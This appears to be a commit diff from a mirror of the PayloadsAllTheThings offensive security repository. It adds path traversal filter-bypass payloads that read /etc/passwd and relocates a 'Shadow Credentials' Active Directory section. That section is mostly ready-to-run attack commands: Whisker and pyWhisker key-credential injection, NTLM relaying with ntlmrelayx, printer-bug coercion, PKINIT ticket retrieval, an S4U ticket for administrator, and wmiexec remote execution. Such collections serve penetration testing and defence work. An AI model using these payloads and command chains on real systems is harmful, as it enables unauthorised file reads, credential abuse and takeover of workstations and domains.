mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
Shadow Credentials
This commit is contained in:
parent
e386a110d9
commit
835d6fffe0
8
.github/hopla_config.json
vendored
8
.github/hopla_config.json
vendored
@ -315,6 +315,14 @@
|
||||
"name": "Filter Bypass 2",
|
||||
"value": "..///////..////..//////etc/passwd"
|
||||
},
|
||||
{
|
||||
"name": "Filter Bypass 3",
|
||||
"value": "...//...//etc/passwd"
|
||||
},
|
||||
{
|
||||
"name": "Filter Bypass 4",
|
||||
"value": "%252f..%252f..%252f..%252f..%252fetc/passwd"
|
||||
},
|
||||
{
|
||||
"name": "Filter Bypass 3",
|
||||
"value": "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
|
||||
|
@ -58,7 +58,6 @@
|
||||
- [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
|
||||
- [Kerberoasting](#kerberoasting)
|
||||
- [KRB_AS_REP Roasting](#krbasrep-roasting)
|
||||
- [Shadow Credentials](#shadow-credentials)
|
||||
- [Pass-the-Hash](#pass-the-hash)
|
||||
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
- [Using impacket](#using-impacket)
|
||||
@ -85,6 +84,7 @@
|
||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||
- [Pass-The-Certificate](#pass-the-certificate)
|
||||
- [Shadow Credentials](#shadow-credentials)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||
@ -1837,68 +1837,6 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
|
||||
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
|
||||
|
||||
|
||||
### Shadow Credentials
|
||||
|
||||
> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
|
||||
|
||||
:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists
|
||||
|
||||
**Requirements**:
|
||||
* Domain Controller on (at least) Windows Server 2016
|
||||
* PKINIT Kerberos authentication
|
||||
* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object
|
||||
|
||||
**Exploitation**:
|
||||
- From Windows, use [Whisker](https://github.com/eladshamir/Whisker):
|
||||
```powershell
|
||||
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
|
||||
Whisker.exe list /target:computername$
|
||||
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
|
||||
Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password"
|
||||
Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1]
|
||||
# Removes a key credential from the target object specified by a DeviceID GUID.
|
||||
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
|
||||
```
|
||||
|
||||
- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker):
|
||||
```bash
|
||||
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
|
||||
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
|
||||
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1"
|
||||
# Removes a key credential from the target object specified by a DeviceID GUID.
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
|
||||
```
|
||||
|
||||
**Scenario**:
|
||||
|
||||
- Scenario: Shadow Credential relaying
|
||||
- Trigger an NTLM authentication from `DC01` (PetitPotam)
|
||||
- Relay it to `DC02` (ntlmrelayx)
|
||||
- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
|
||||
- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
|
||||
- Scenario: Workstation Takeover with RBCD
|
||||
```ps1
|
||||
# Only for C2: Add Reverse Port Forward from 8081 to Team Server 81
|
||||
|
||||
# Set up ntlmrelayx to relay authentication from target workstation to DC
|
||||
proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81
|
||||
|
||||
# Execute printer bug to trigger authentication from target workstation
|
||||
proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file
|
||||
|
||||
# Get a TGT using the newly acquired certificate via PKINIT
|
||||
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR
|
||||
|
||||
# Get a TGS for the target account
|
||||
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v
|
||||
|
||||
# Utilize the TGS for future activity
|
||||
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
|
||||
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
|
||||
```
|
||||
|
||||
### Pass-the-Hash
|
||||
|
||||
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
||||
@ -2594,6 +2532,71 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
```
|
||||
|
||||
|
||||
### Shadow Credentials
|
||||
|
||||
> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match.
|
||||
|
||||
:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists
|
||||
|
||||
**Requirements**:
|
||||
* Domain Controller on (at least) Windows Server 2016
|
||||
* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured
|
||||
* PKINIT Kerberos authentication
|
||||
* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object
|
||||
|
||||
**Exploitation**:
|
||||
- From Windows, use [Whisker](https://github.com/eladshamir/Whisker):
|
||||
```powershell
|
||||
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
|
||||
Whisker.exe list /target:computername$
|
||||
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
|
||||
Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password"
|
||||
Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1]
|
||||
# Removes a key credential from the target object specified by a DeviceID GUID.
|
||||
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
|
||||
```
|
||||
|
||||
- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker):
|
||||
```bash
|
||||
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
|
||||
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
|
||||
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1"
|
||||
# Removes a key credential from the target object specified by a DeviceID GUID.
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
|
||||
```
|
||||
|
||||
**Scenario**:
|
||||
|
||||
- **Scenario 1**: Shadow Credential relaying
|
||||
- Trigger an NTLM authentication from `DC01` (PetitPotam)
|
||||
- Relay it to `DC02` (ntlmrelayx)
|
||||
- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
|
||||
- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
|
||||
|
||||
- **Scenario 2**: Workstation Takeover with RBCD
|
||||
```ps1
|
||||
# Only for C2: Add Reverse Port Forward from 8081 to Team Server 81
|
||||
|
||||
# Set up ntlmrelayx to relay authentication from target workstation to DC
|
||||
proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81
|
||||
|
||||
# Execute printer bug to trigger authentication from target workstation
|
||||
proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file
|
||||
|
||||
# Get a TGT using the newly acquired certificate via PKINIT
|
||||
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR
|
||||
|
||||
# Get a TGS for the target account
|
||||
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v
|
||||
|
||||
# Utilize the TGS for future activity
|
||||
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
|
||||
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
|
||||
```
|
||||
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
|
||||
@ -3863,4 +3866,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
|
||||
* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html)
|
||||
* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
|
||||
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
|
||||
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
|
||||
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
|
Loading…
Reference in New Issue
Block a user